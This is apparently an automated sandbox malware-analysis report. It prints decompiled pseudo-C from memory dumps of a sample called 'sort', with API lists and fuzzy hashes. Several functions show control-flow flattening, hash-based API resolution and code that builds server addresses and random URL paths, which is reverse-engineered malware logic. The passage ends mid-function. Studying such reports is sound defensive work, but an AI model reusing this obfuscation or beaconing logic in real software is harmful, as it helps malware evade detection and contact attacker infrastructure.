                                            • Instruction ID: 3b28708bc0a1016f049b86d81bab26ae888aa54a77c2c6cf0aff380c6ea48e92
                                            • Opcode Fuzzy Hash: e21fefbac9b959bc40e50a7e112f0a59602f04dbb09a707c84792978608cf12c
                                            • Instruction Fuzzy Hash: 3431C271740211BBEB309F62CC46F9ABF64EF48714F118126FA09AA1E1C7B8A901CB5C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 47%
                                            			E004104E7(void* __ebx) {
                                            				struct HWND__* _v8;
                                            				struct HWND__* _v12;
                                            				void* __ecx;
                                            				void* __esi;
                                            				struct HWND__* _t28;
                                            				int _t31;
                                            				int _t32;
                                            				int _t34;
                                            				void* _t35;
                                            				void* _t40;
                                            				void* _t41;
                                            				signed int _t43;
                                            				signed int _t52;
                                            
                                            				_t40 = __ebx;
                                            				_t52 = _t43;
                                            				E00406330(lstrlenA( *(_t52 + 0x78)) + 1 +  *(_t52 + 0x78), 0,  *((intOrPtr*)(_t52 + 0x7c)) - lstrlenA( *(_t52 + 0x78)) + 1);
                                            				_v8 = GetFocus();
                                            				 *(_t52 + 0x60) = E004120A5(_t52);
                                            				E00413C3E();
                                            				_t28 =  *(_t52 + 0x60);
                                            				if(_t28 != 0 && IsWindowEnabled(_t28) != 0) {
                                            					_push(1);
                                            					_pop(0);
                                            					EnableWindow( *(_t52 + 0x60), 0);
                                            				}
                                            				_push(_t40);
                                            				_t41 = E004249C4();
                                            				if(( *(_t52 + 0x92) & 0x00000008) == 0) {
                                            					_push(_t52);
                                            					"VWh\rDB"();
                                            				} else {
                                            					 *(_t41 + 0x18) = _t52;
                                            				}
                                            				_push(_t52 + 0x5c);
                                            				if( *((intOrPtr*)(_t52 + 0xa8)) == 0) {
                                            					_t31 = GetSaveFileNameA();
                                            				} else {
                                            					_t31 = GetOpenFileNameA();
                                            				}
                                            				 *(_t41 + 0x18) =  *(_t41 + 0x18) & 0x00000000;
                                            				_v8 = _t31;
                                            				if(0 != 0) {
                                            					EnableWindow( *(_t52 + 0x60), 1);
                                            				}
                                            				_t32 = IsWindow(_v12);
                                            				_t64 = _t32;
                                            				if(_t32 != 0) {
                                            					SetFocus(_v12);
                                            				}
                                            				E004120DF(_t52, _t52, _t64);
                                            				_t34 = _v8;
                                            				if(_t34 == 0) {
                                            					_t35 = 2;
                                            					return _t35;
                                            				}
                                            				return _t34;
                                            			}

















                                            APIs
                                            • lstrlenA.KERNEL32(?), ref: 004104F1
                                            • GetFocus.USER32 ref: 0041050C
                                              • Part of subcall function 00413C3E: UnhookWindowsHookEx.USER32(?), ref: 00413C63
                                            • IsWindowEnabled.USER32(?), ref: 00410535
                                            • EnableWindow.USER32(?,00000000), ref: 00410547
                                            • GetOpenFileNameA.COMDLG32(?), ref: 00410572
                                            • GetSaveFileNameA.COMDLG32(?), ref: 00410579
                                            • EnableWindow.USER32(?,00000001), ref: 00410590
                                            • IsWindow.USER32(00000000), ref: 00410596
                                            • SetFocus.USER32(00000000), ref: 004105A4
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Window$EnableFileFocusName$EnabledHookOpenSaveUnhookWindowslstrlen
                                            • String ID:
                                            • API String ID: 3606897497-0
                                            • Opcode ID: 26475a310f4ed8bf1bdae507504d36e30356123cd70d61a8b284773050b4369f
                                            • Instruction ID: cfd9afc9f89d739c60573f6ed008476d2ccbece9f7daf62680160fc279b61255
                                            • Opcode Fuzzy Hash: 26475a310f4ed8bf1bdae507504d36e30356123cd70d61a8b284773050b4369f
                                            • Instruction Fuzzy Hash: 68219271210700BFD724AF32DC4AB9B7BE9EF44305F04442EF55696292DBB9E8C18B99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 72%
                                            			E022712B0(char __ecx, signed int __edx, intOrPtr* _a4) {
                                            				char _v2048;
                                            				char _v2560;
                                            				char _v2688;
                                            				char _v2816;
                                            				intOrPtr* _v2820;
                                            				intOrPtr* _v2824;
                                            				char _v2828;
                                            				char _v2836;
                                            				char _v2844;
                                            				signed int _v2848;
                                            				intOrPtr _v2852;
                                            				void* _v2856;
                                            				intOrPtr* _v2860;
                                            				char _v2864;
                                            				intOrPtr _v2868;
                                            				char _v2872;
                                            				intOrPtr* _v2876;
                                            				signed int _v2880;
                                            				signed int _v2884;
                                            				signed int _v2888;
                                            				char _v2892;
                                            				intOrPtr* _v2896;
                                            				intOrPtr _v2904;
                                            				intOrPtr* _v2908;
                                            				void* __ebx;
                                            				void* __ebp;
                                            				void* _t117;
                                            				signed int _t118;
                                            				void* _t121;
                                            				intOrPtr _t127;
                                            				intOrPtr* _t139;
                                            				intOrPtr* _t141;
                                            				signed int _t146;
                                            				signed int _t154;
                                            				intOrPtr* _t157;
                                            				intOrPtr* _t159;
                                            				signed int _t163;
                                            				intOrPtr* _t174;
                                            				signed int _t175;
                                            				signed int _t178;
                                            				intOrPtr* _t182;
                                            				void* _t189;
                                            				intOrPtr* _t191;
                                            				intOrPtr* _t194;
                                            				intOrPtr* _t196;
                                            				intOrPtr _t199;
                                            				char _t241;
                                            				signed char* _t243;
                                            				signed int _t263;
                                            				short* _t265;
                                            				void* _t266;
                                            				short* _t267;
                                            				void* _t268;
                                            				void* _t269;
                                            				intOrPtr _t270;
                                            				signed int _t273;
                                            				intOrPtr* _t274;
                                            				void* _t276;
                                            				void* _t277;
                                            				intOrPtr* _t278;
                                            				void* _t280;
                                            				void* _t282;
                                            				void* _t283;
                                            				void* _t284;
                                            
                                            				_t280 =  &_v2896;
                                            				_t278 = _v2864;
                                            				_t263 = __edx;
                                            				_v2888 = 0;
                                            				_t241 = __ecx;
                                            				_v2884 = __edx;
                                            				_t196 = _v2860;
                                            				_t117 = 0xa52ba2c;
                                            				_v2892 = __ecx;
                                            				_v2896 = _t196;
                                            				_v2876 = _t278;
                                            				while(1) {
                                            					L1:
                                            					_t191 = _a4;
                                            					goto L2;
                                            					do {
                                            						while(1) {
                                            							L2:
                                            							_t282 = _t117 - 0x1a712fee;
                                            							if(_t282 > 0) {
                                            								break;
                                            							}
                                            							if(_t282 == 0) {
                                            								_t157 =  *0x227dea8;
                                            								__eflags = _t157;
                                            								if(_t157 == 0) {
                                            									_t157 = E02273E80(_t191, E02273F20(0xbb398380), 0x97f883e, _t278);
                                            									 *0x227dea8 = _t157;
                                            								}
                                            								_t268 =  *_t157();
                                            								_t159 =  *0x227e1a0;
                                            								__eflags = _t159;
                                            								if(_t159 == 0) {
                                            									_t159 = E02273E80(_t191, E02273F20(0xbb398380), 0x26c3f343, _t278);
                                            									 *0x227e1a0 = _t159;
                                            								}
                                            								 *_t159(_t268, 0, _v2844);
                                            								_t196 = _v2908;
                                            								_t117 = 0xa9569d6;
                                            								_t241 = _v2904;
                                            								continue;
                                            							} else {
                                            								_t283 = _t117 - 0xa52ba2c;
                                            								if(_t283 > 0) {
                                            									__eflags = _t117 - 0x1194a5ec;
                                            									if(__eflags > 0) {
                                            										__eflags = _t117 - 0x1947423a;
                                            										if(_t117 != 0x1947423a) {
                                            											goto L28;
                                            										} else {
                                            											_t163 = E02271FB0( &_v2872,  &_v2856);
                                            											_t196 = _v2896;
                                            											_t241 = _v2892;
                                            											asm("sbb eax, eax");
                                            											_t117 = ( ~_t163 & 0xd3a4a493) + 0x2ec7d52f;
                                            											continue;
                                            										}
                                            									} else {
                                            										if(__eflags == 0) {
                                            											_t265 =  &_v2560;
                                            											_t194 = _v2880 - (0xaaaaaaab * _v2880 >> 0x20 >> 2) + (0xaaaaaaab * _v2880 >> 0x20 >> 2) * 2 + (0xaaaaaaab * _v2880 >> 0x20 >> 2) + (0xaaaaaaab * _v2880 >> 0x20 >> 2) * 2 + 1;
                                            											__eflags = _t194;
                                            											if(_t194 != 0) {
                                            												do {
                                            													_t273 = (_v2880 & 0x0000000f) + 4;
                                            													E02274ED0(_t265, _t273,  &_v2880);
                                            													_t267 = _t265 + _t273 * 2;
                                            													_t280 = _t280 + 4;
                                            													 *_t267 = 0x2f;
                                            													_t265 = _t267 + 2;
                                            													_t194 = _t194 - 1;
                                            													__eflags = _t194;
                                            												} while (_t194 != 0);
                                            												_t278 = _v2876;
                                            												_t196 = _v2896;
                                            											}
                                            											_t241 = _v2892;
                                            											 *_t265 = 0;
                                            											_t117 = 0x26613761;
                                            											_t263 = _v2884;
                                            											goto L1;
                                            										} else {
                                            											__eflags = _t117 - 0xa9569d6;
                                            											if(_t117 == 0xa9569d6) {
                                            												E02274250(_t191, _v2864);
                                            												_t196 = _v2896;
                                            												_t117 = 0xc5127ed;
                                            												_t241 = _v2892;
                                            												continue;
                                            											} else {
                                            												__eflags = _t117 - 0xc5127ed;
                                            												if(_t117 == 0xc5127ed) {
                                            													L69:
                                            													E02274250(_t191, _t278);
                                            													L70:
                                            													return _v2888;
                                            												} else {
                                            													goto L28;
                                            												}
                                            											}
                                            										}
                                            									}
                                            								} else {
                                            									if(_t283 == 0) {
                                            										_t174 =  *0x227dd4c;
                                            										__eflags = _t174;
                                            										if(_t174 == 0) {
                                            											_t174 = E02273E80(_t191, E02273F20(0xbb398380), 0xae3c1a47, _t278);
                                            											 *0x227dd4c = _t174;
                                            										}
                                            										_t175 =  *_t174();
                                            										_t196 = _v2896;
                                            										_t241 = _v2892;
                                            										_v2880 = _t175;
                                            										_t117 = 0x38f41d46;
                                            										continue;
                                            									} else {
                                            										_t284 = _t117 - 0x3354cb2;
                                            										if(_t284 > 0) {
                                            											__eflags = _t117 - 0x8f8b881;
                                            											if(_t117 != 0x8f8b881) {
                                            												goto L28;
                                            											} else {
                                            												_t178 = E02271950( &_v2844,  &_v2688,  &_v2836);
                                            												_t196 = _v2896;
                                            												_t280 = _t280 + 4;
                                            												_t241 = _v2892;
                                            												asm("sbb eax, eax");
                                            												_t117 = ( ~_t178 & 0x0c54f09a) + 0x1a712fee;
                                            												continue;
                                            											}
                                            										} else {
                                            											if(_t284 == 0) {
                                            												_t269 = E022734C0(0x227d0e0);
                                            												_t182 =  *0x227dc60;
                                            												__eflags = _t182;
                                            												if(_t182 == 0) {
                                            													_t182 = E02273E80(_t191, E02273F20(0xe66945e6), 0xcca28b0d, _t278);
                                            													 *0x227dc60 = _t182;
                                            												}
                                            												 *_t182( &_v2048, 0x400, _t269,  &_v2816,  &_v2688);
                                            												_t280 = _t280 + 0x14;
                                            												E02273460(_t269);
                                            												_t196 = _v2896;
                                            												_t117 = 0x8f8b881;
                                            												_t241 = _v2892;
                                            												continue;
                                            											} else {
                                            												if(_t117 == 0xe50069) {
                                            													E02274250(_t191, _v2856);
                                            													_t196 = _v2896;
                                            													_t117 = 0x2ec7d52f;
                                            													_t241 = _v2892;
                                            													continue;
                                            												} else {
                                            													if(_t117 != 0x26c79c2) {
                                            														goto L28;
                                            													} else {
                                            														 *((intOrPtr*)(_t191 + 4)) =  *_v2856;
                                            														_t270 = E022742F0(_t191,  *_v2856);
                                            														 *_t191 = _t270;
                                            														if(_t270 != 0) {
                                            															_push( *((intOrPtr*)(_t191 + 4)));
                                            															_push(_t270);
                                            															_t189 = E022757E0(_v2852 - 4);
                                            															_t280 = _t280 + 8;
                                            															asm("sbb edi, edi");
                                            															_v2888 =  ~_t263;
                                            															if(0 == _t189) {
                                            																E02274250(_t191,  *_t191);
                                            															}
                                            															_t263 = _v2884;
                                            														}
                                            														_t196 = _v2896;
                                            														_t117 = 0xe50069;
                                            														_t241 = _v2892;
                                            														continue;
                                            													}
                                            												}
                                            											}
                                            										}
                                            									}
                                            								}
                                            							}
                                            							L71:
                                            						}
                                            						__eflags = _t117 - 0x2ec7d52f;
                                            						if(__eflags > 0) {
                                            							__eflags = _t117 - 0x310afd51;
                                            							if(_t117 == 0x310afd51) {
                                            								_v2828 = _t241;
                                            								_v2820 = _t196;
                                            								_v2824 = _t278;
                                            								_t118 = E02271E60( &_v2828,  &_v2864);
                                            								_t196 = _v2896;
                                            								_t241 = _v2892;
                                            								asm("sbb eax, eax");
                                            								_t117 = ( ~_t118 & 0x1deeb958) + 0xc5127ed;
                                            								goto L2;
                                            							} else {
                                            								__eflags = _t117 - 0x3380dca7;
                                            								if(_t117 == 0x3380dca7) {
                                            									_t121 = E022734C0(0x227d080);
                                            									_t274 =  *0x227dc60;
                                            									_t266 = _t121;
                                            									__eflags = _t274;
                                            									if(_t274 == 0) {
                                            										_t274 = E02273E80(_t191, E02273F20(0xe66945e6), 0xcca28b0d, _t278);
                                            										 *0x227dc60 = _t274;
                                            									}
                                            									_t199 =  *0x227e2e0; // 0x4bef38
                                            									_t243 =  *(_t199 + 0xc);
                                            									 *_t274( &_v2816, 0x40, _t266, _t243[3] & 0x000000ff, _t243[2] & 0x000000ff, _t243[1] & 0x000000ff,  *_t243 & 0x000000ff);
                                            									_t280 = _t280 + 0x1c;
                                            									E02273460(_t266);
                                            									_t127 =  *0x227e2e0; // 0x4bef38
                                            									_t196 = _v2896;
                                            									_t263 = _v2884;
                                            									_t241 = _v2892;
                                            									_v2848 =  *( *((intOrPtr*)(_t127 + 0xc)) + 4) & 0x0000ffff;
                                            									_t117 = 0x1194a5ec;
                                            									goto L2;
                                            								} else {
                                            									__eflags = _t117 - 0x38f41d46;
                                            									if(_t117 != 0x38f41d46) {
                                            										goto L28;
                                            									} else {
                                            										_t276 =  *(_t263 + 4) + (0x51eb851f *  *(_t263 + 4) >> 0x20 >> 5) * 4 + (0x51eb851f *  *(_t263 + 4) >> 0x20 >> 5);
                                            										_t278 = E022742F0(_t191, _t276);
                                            										_v2876 = _t278;
                                            										__eflags = _t278;
                                            										if(_t278 == 0) {
                                            											goto L70;
                                            										} else {
                                            											_push(_t276);
                                            											_push(_t278);
                                            											_t196 = E02275BC0( *_t263,  *(_t263 + 4), _t278);
                                            											_t280 = _t280 + 8;
                                            											_v2896 = _t196;
                                            											__eflags = _t196;
                                            											if(_t196 == 0) {
                                            												goto L69;
                                            											} else {
                                            												_t241 = _v2892;
                                            												_t117 = 0x310afd51;
                                            												goto L2;
                                            											}
                                            										}
                                            									}
                                            								}
                                            							}
                                            						} else {
                                            							if(__eflags == 0) {
                                            								_t139 =  *0x227dea8;
                                            								__eflags = _t139;
                                            								if(_t139 == 0) {
                                            									_t139 = E02273E80(_t191, E02273F20(0xbb398380), 0x97f883e, _t278);
                                            									 *0x227dea8 = _t139;
                                            								}
                                            								_t277 =  *_t139();
                                            								_t141 =  *0x227e1a0;
                                            								__eflags = _t141;
                                            								if(_t141 == 0) {
                                            									_t141 = E02273E80(_t191, E02273F20(0xbb398380), 0x26c3f343, _t278);
                                            									 *0x227e1a0 = _t141;
                                            								}
                                            								 *_t141(_t277, 0, _v2872);
                                            								_t196 = _v2908;
                                            								_t117 = 0x2be07bd7;
                                            								_t241 = _v2904;
                                            								goto L2;
                                            							} else {
                                            								__eflags = _t117 - 0x2a3fe145;
                                            								if(__eflags > 0) {
                                            									__eflags = _t117 - 0x2be07bd7;
                                            									if(_t117 != 0x2be07bd7) {
                                            										goto L28;
                                            									} else {
                                            										E02274250(_t191, _v2836);
                                            										_t196 = _v2896;
                                            										_t117 = 0x1a712fee;
                                            										_t241 = _v2892;
                                            										goto L2;
                                            									}
                                            								} else {
                                            									if(__eflags == 0) {
                                            										_t146 = E02272290( &_v2864,  &_v2844);
                                            										_t196 = _v2896;
                                            										_t241 = _v2892;
                                            										asm("sbb eax, eax");
                                            										_t117 = ( ~_t146 & 0x28eb72d1) + 0xa9569d6;
                                            										goto L2;
                                            									} else {
                                            										__eflags = _t117 - 0x26613761;
                                            										if(_t117 == 0x26613761) {
                                            											E02271C70( &_v2688);
                                            											_t196 = _v2896;
                                            											_t117 = 0x3354cb2;
                                            											_t241 = _v2892;
                                            											goto L2;
                                            										} else {
                                            											__eflags = _t117 - 0x26c62088;
                                            											if(_t117 != 0x26c62088) {
                                            												goto L28;
                                            											} else {
                                            												_push( &_v2872);
                                            												_v2872 = 0;
                                            												_push( &_v2836);
                                            												_v2868 = 0;
                                            												_push( &_v2048);
                                            												_push( &_v2560);
                                            												_t154 = E02272C20( &_v2816, _v2848);
                                            												_t196 = _v2896;
                                            												_t280 = _t280 + 0x10;
                                            												_t241 = _v2892;
                                            												asm("sbb eax, eax");
                                            												_t117 = ( ~_t154 & 0xed66c663) + 0x2be07bd7;
                                            												goto L2;
                                            											}
                                            										}
                                            									}
                                            								}
                                            							}
                                            						}
                                            						goto L71;
                                            						L28:
                                            						__eflags = _t117 - 0x33f32524;
                                            					} while (_t117 != 0x33f32524);
                                            					return _v2888;
                                            					goto L71;
                                            				}
                                            			}

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true
                                            • Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2270000_sort.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: 8K$E?*$a7a&$a7a&$Ei$Ei
                                            • API String ID: 0-3409945958
                                            • Opcode ID: 22d97df8ea24bb3fde94b5d1e74d944d7ca6bbea8ab982c4d4056d8fb136de7f
                                            • Instruction ID: 9f555a3d82cb8eb9a38dadd34963eddec330714abd831a00f3e5ca2195d6a092
                                            • Opcode Fuzzy Hash: 22d97df8ea24bb3fde94b5d1e74d944d7ca6bbea8ab982c4d4056d8fb136de7f
                                            • Instruction Fuzzy Hash: A1E19E7162C3428BC718DFA4D490A6FB3E6AFC4344F14492DE89ADB348DB74E915CB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 38%
                                            			E0041D3C1(intOrPtr __ecx, void* __edx, intOrPtr _a4, RECT* _a8) {
                                            				struct tagRECT _v20;
                                            				struct tagRECT _v36;
                                            				char _v296;
                                            				void* __ebp;
                                            				int _t61;
                                            				signed char _t64;
                                            				signed char _t69;
                                            				void* _t79;
                                            				struct HWND__* _t81;
                                            				intOrPtr _t109;
                                            				signed int _t115;
                                            				signed int _t117;
                                            				void* _t130;
                                            				signed int _t131;
                                            				intOrPtr _t134;
                                            				void* _t136;
                                            
                                            				_t130 = __edx;
                                            				_t134 = _a4;
                                            				_t109 = __ecx;
                                            				_t61 = GetWindowRect( *(_t134 + 0x1c),  &_v36);
                                            				if( *((intOrPtr*)(_t134 + 0x70)) != _t109) {
                                            					L3:
                                            					if( *((intOrPtr*)(_t109 + 0x78)) != 0 && ( *(_t134 + 0x68) & 0x00000040) != 0) {
                                            						 *(_t109 + 0x64) =  *(_t109 + 0x64) | 0x00000040;
                                            					}
                                            					 *(_t109 + 0x64) =  *(_t109 + 0x64) & 0xfffffff9;
                                            					_t64 =  *(_t134 + 0x64) & 0x00000006 |  *(_t109 + 0x64);
                                            					 *(_t109 + 0x64) = _t64;
                                            					if((_t64 & 0x00000040) == 0) {
                                            						E004165E5(_t134,  &_v296, 0x104);
                                            						E0041A843( *(_t109 + 0x1c),  &_v296);
                                            					}
                                            					_t69 = ( *(_t109 + 0x64) ^  *(_t134 + 0x64)) & 0x0000f000 ^  *(_t134 + 0x64) | 0x0000000f;
                                            					if( *((intOrPtr*)(_t109 + 0x78)) == 0) {
                                            						_t70 = _t69 & 0x000000fe;
                                            						__eflags = _t69 & 0x000000fe;
                                            					} else {
                                            						_t70 = _t69 | 0x00000001;
                                            					}
                                            					E004263C3(_t134, _t70);
                                            					_t131 = E0041DCB9(_t109, GetDlgCtrlID( *(_t134 + 0x1c)) & 0x0000ffff, 0xffffffff);
                                            					if(_t131 > 0) {
                                            						 *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x80)) + _t131 * 4)) = _t134;
                                            					}
                                            					if(_a8 == 0) {
                                            						__eflags = _t131 - 1;
                                            						if(_t131 < 1) {
                                            							_t132 = _t109 + 0x7c;
                                            							E0041158A(_t109 + 0x7c,  *((intOrPtr*)(_t109 + 0x84)), _t134);
                                            							E0041158A(_t109 + 0x7c,  *((intOrPtr*)(_t132 + 8)), 0);
                                            						}
                                            						_t115 =  *0x439bf4; // 0x2
                                            						__eflags = 0;
                                            						_push(0x115);
                                            						_push(0);
                                            						_push(0);
                                            						_push( ~_t115);
                                            						_t117 =  *0x439bf0; // 0x2
                                            						_push( ~_t117);
                                            						_push(0);
                                            					} else {
                                            						CopyRect( &_v20, _a8);
                                            						E0041A2F1(_t109,  &_v20);
                                            						if(_t131 < 1) {
                                            							asm("cdq");
                                            							asm("cdq");
                                            							_push((_v20.bottom - _v20.top - _t130 >> 1) + _v20.top);
                                            							_push((_v20.right - _v20.left - _t130 >> 1) + _v20.left);
                                            							asm("movsd");
                                            							asm("movsd");
                                            							_push(_a4);
                                            							asm("movsd");
                                            							asm("movsd");
                                            							E0041DD44(_t109);
                                            							_t134 = _a4;
                                            						}
                                            						_push(0x114);
                                            						_push(_v20.bottom - _v20.top);
                                            						_push(_v20.right - _v20.left);
                                            						_push(_v20.top);
                                            						_push(_v20.left);
                                            						_push(0);
                                            					}
                                            					E0041663D(_t134);
                                            					if(E00413740(_t136, GetParent( *(_t134 + 0x1c))) != _t109) {
                                            						if(_t109 != 0) {
                                            							_t81 =  *(_t109 + 0x1c);
                                            						} else {
                                            							_t81 = 0;
                                            						}
                                            						E00413740(_t136, SetParent( *(_t134 + 0x1c), _t81));
                                            					}
                                            					_t120 =  *((intOrPtr*)(_t134 + 0x70));
                                            					_t153 =  *((intOrPtr*)(_t134 + 0x70));
                                            					if( *((intOrPtr*)(_t134 + 0x70)) != 0) {
                                            						E0041D609(_t120, _t153, _t134, 0xffffffff, 0);
                                            					}
                                            					 *((intOrPtr*)(_t134 + 0x70)) = _t109;
                                            					_t79 = E004225AA(_t109, _t153);
                                            					 *(_t79 + 0xb8) =  *(_t79 + 0xb8) | 0x0000000c;
                                            					return _t79;
                                            				}
                                            				if(_a8 != 0) {
                                            					_t61 = EqualRect( &_v36, _a8);
                                            					if(_t61 == 0) {
                                            						goto L3;
                                            					}
                                            				}
                                            				return _t61;
                                            			}




















                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Rect$Parent$CopyCtrlEqualWindow
                                            • String ID: @
                                            • API String ID: 3581194824-2766056989
                                            • Opcode ID: 2ea802bbfde414efe59f16374f298989db8c13d0e5b755017994176e5bba3002
                                            • Instruction ID: 8366d14a4fbab590a3c5e893c5bf745e495171ad1a8ef82a64abe53d0d133945
                                            • Opcode Fuzzy Hash: 2ea802bbfde414efe59f16374f298989db8c13d0e5b755017994176e5bba3002
                                            • Instruction Fuzzy Hash: 88518FB1A00615ABDF14DF69CC85AEE77AAEB44308F00452AE912D72A1DB38E985CB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 69%
                                            			E02279FC8(void* __eax, void* __ebx, void* __ebp, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, char _a36, char _a40, char _a44, intOrPtr _a48, char _a56, char _a576) {
                                            				intOrPtr* _v0;
                                            				intOrPtr _v8;
                                            				intOrPtr _v12;
                                            				void* _t37;
                                            				signed int _t38;
                                            				intOrPtr* _t41;
                                            				signed int _t44;
                                            				intOrPtr* _t47;
                                            				intOrPtr* _t49;
                                            				intOrPtr* _t53;
                                            				intOrPtr* _t54;
                                            				intOrPtr* _t56;
                                            				intOrPtr* _t60;
                                            				intOrPtr* _t62;
                                            				intOrPtr* _t66;
                                            				intOrPtr _t70;
                                            				intOrPtr* _t71;
                                            				intOrPtr* _t75;
                                            				signed int _t76;
                                            				signed int _t82;
                                            				intOrPtr* _t95;
                                            				intOrPtr _t98;
                                            				char* _t100;
                                            				intOrPtr _t101;
                                            				intOrPtr _t134;
                                            				intOrPtr* _t146;
                                            				void* _t148;
                                            				intOrPtr _t149;
                                            				void* _t150;
                                            				intOrPtr _t154;
                                            				intOrPtr _t155;
                                            				intOrPtr _t156;
                                            				char* _t157;
                                            				void* _t158;
                                            				char _t161;
                                            				intOrPtr _t165;
                                            				void* _t166;
                                            				void* _t170;
                                            				void* _t171;
                                            
                                            				_t37 = __eax;
                                            				goto L3;
                                            				do {
                                            					while(1) {
                                            						L3:
                                            						_t170 = _t37 - 0x1bec2acf;
                                            						if(_t170 > 0) {
                                            							goto L41;
                                            						}
                                            						L4:
                                            						if(_t170 == 0) {
                                            							_t54 =  *0x227dea8;
                                            							__eflags = _t54;
                                            							if(_t54 == 0) {
                                            								_t100 = E02273F20(0xbb398380);
                                            								_t54 = E02273E80(_t95, _t100, 0x97f883e, _t161);
                                            								 *0x227dea8 = _t54;
                                            							}
                                            							_t148 =  *_t54();
                                            							_t56 =  *0x227e1a0;
                                            							__eflags = _t56;
                                            							if(_t56 == 0) {
                                            								_t100 = E02273F20(0xbb398380);
                                            								_t56 = E02273E80(_t95, _t100, 0x26c3f343, _t161);
                                            								 *0x227e1a0 = _t56;
                                            							}
                                            							 *_t56(_t148, 0, _t95);
                                            							_t149 = _a12;
                                            							_t37 = 0x1dedf83c;
                                            							continue;
                                            						} else {
                                            							_t171 = _t37 - 0x191840a9;
                                            							if(_t171 > 0) {
                                            								__eflags = _t37 - 0x1a29c84b;
                                            								if(_t37 == 0x1a29c84b) {
                                            									_t60 =  *0x227dea8;
                                            									__eflags = _t60;
                                            									if(_t60 == 0) {
                                            										_t100 = E02273F20(0xbb398380);
                                            										_t60 = E02273E80(_t95, _t100, 0x97f883e, _t161);
                                            										 *0x227dea8 = _t60;
                                            									}
                                            									_t150 =  *_t60();
                                            									_t62 =  *0x227dcec;
                                            									__eflags = _t62;
                                            									if(_t62 == 0) {
                                            										_t100 = E02273F20(0xbb398380);
                                            										_t62 = E02273E80(_t95, _t100, 0xe9233692, _t161);
                                            										 *0x227dcec = _t62;
                                            									}
                                            									_t53 =  *_t62(_t150, 8, 0x48);
                                            									_a16 = _t53;
                                            									__eflags = _t53;
                                            									if(_t53 == 0) {
                                            										L59:
                                            										return _t53;
                                            									} else {
                                            										_t149 = _a12;
                                            										_t37 = 0x1fc710ef;
                                            										continue;
                                            									}
                                            								} else {
                                            									__eflags = _t37 - 0x1a44b2a5;
                                            									if(_t37 != 0x1a44b2a5) {
                                            										break;
                                            									} else {
                                            										_t157 = E022734C0(0x227da50);
                                            										_t66 =  *0x227dc60;
                                            										__eflags = _t66;
                                            										if(_t66 == 0) {
                                            											_t66 = E02273E80(_t95, E02273F20(0xe66945e6), 0xcca28b0d, _t161);
                                            											 *0x227dc60 = _t66;
                                            										}
                                            										 *_t66( &_a56, 0x104, _t157,  &_a576, _t95);
                                            										_t166 = _t166 + 0x14;
                                            										_t100 = _t157;
                                            										E02273460(_t100);
                                            										_t149 = _a24;
                                            										_t37 = 0x10f8a433;
                                            										continue;
                                            									}
                                            								}
                                            							} else {
                                            								if(_t171 == 0) {
                                            									_t101 = _a28;
                                            									 *((intOrPtr*)(_t101 + 0x24)) = _t149;
                                            									_t70 =  *0x227e2dc; // 0x0
                                            									 *((intOrPtr*)(_t101 + 0x20)) = _t70;
                                            									 *0x227e2dc = _t101;
                                            									return _t70;
                                            								} else {
                                            									if(_t37 == 0xa70e03e) {
                                            										_t71 =  *0x227dc70;
                                            										__eflags = _t71;
                                            										if(_t71 == 0) {
                                            											_t100 = E02273F20(0xbb398380);
                                            											_t71 = E02273E80(_t95, _t100, 0x560d239b, _t161);
                                            											 *0x227dc70 = _t71;
                                            										}
                                            										 *_t71(_a44);
                                            										_t37 = 0x191840a9;
                                            										continue;
                                            									} else {
                                            										if(_t37 == 0x10f8a433) {
                                            											_push(0);
                                            											_push(_t100);
                                            											_t100 = 0;
                                            											E02274BA0(_t95, 0,  &_a56, _t161, 1);
                                            											_t166 = _t166 + 0xc;
                                            											_t37 = 0x1bec2acf;
                                            											continue;
                                            										} else {
                                            											if(_t37 != 0x18d473c5) {
                                            												break;
                                            											} else {
                                            												_t154 =  *0x227e2ec; // 0x4d9470
                                            												_t75 =  *0x227e024;
                                            												_t155 = _t154 + 0x278;
                                            												_a48 = _t155;
                                            												if(_t75 == 0) {
                                            													_t100 = E02273F20(0xbb398380);
                                            													_t75 = E02273E80(_t95, _t100, 0x5262aefc, _t161);
                                            													 *0x227e024 = _t75;
                                            												}
                                            												_t76 =  *_t75(_t155);
                                            												_t156 =  *0x227ded0;
                                            												_a48 = 2 + _t76 * 2;
                                            												if(_t156 == 0) {
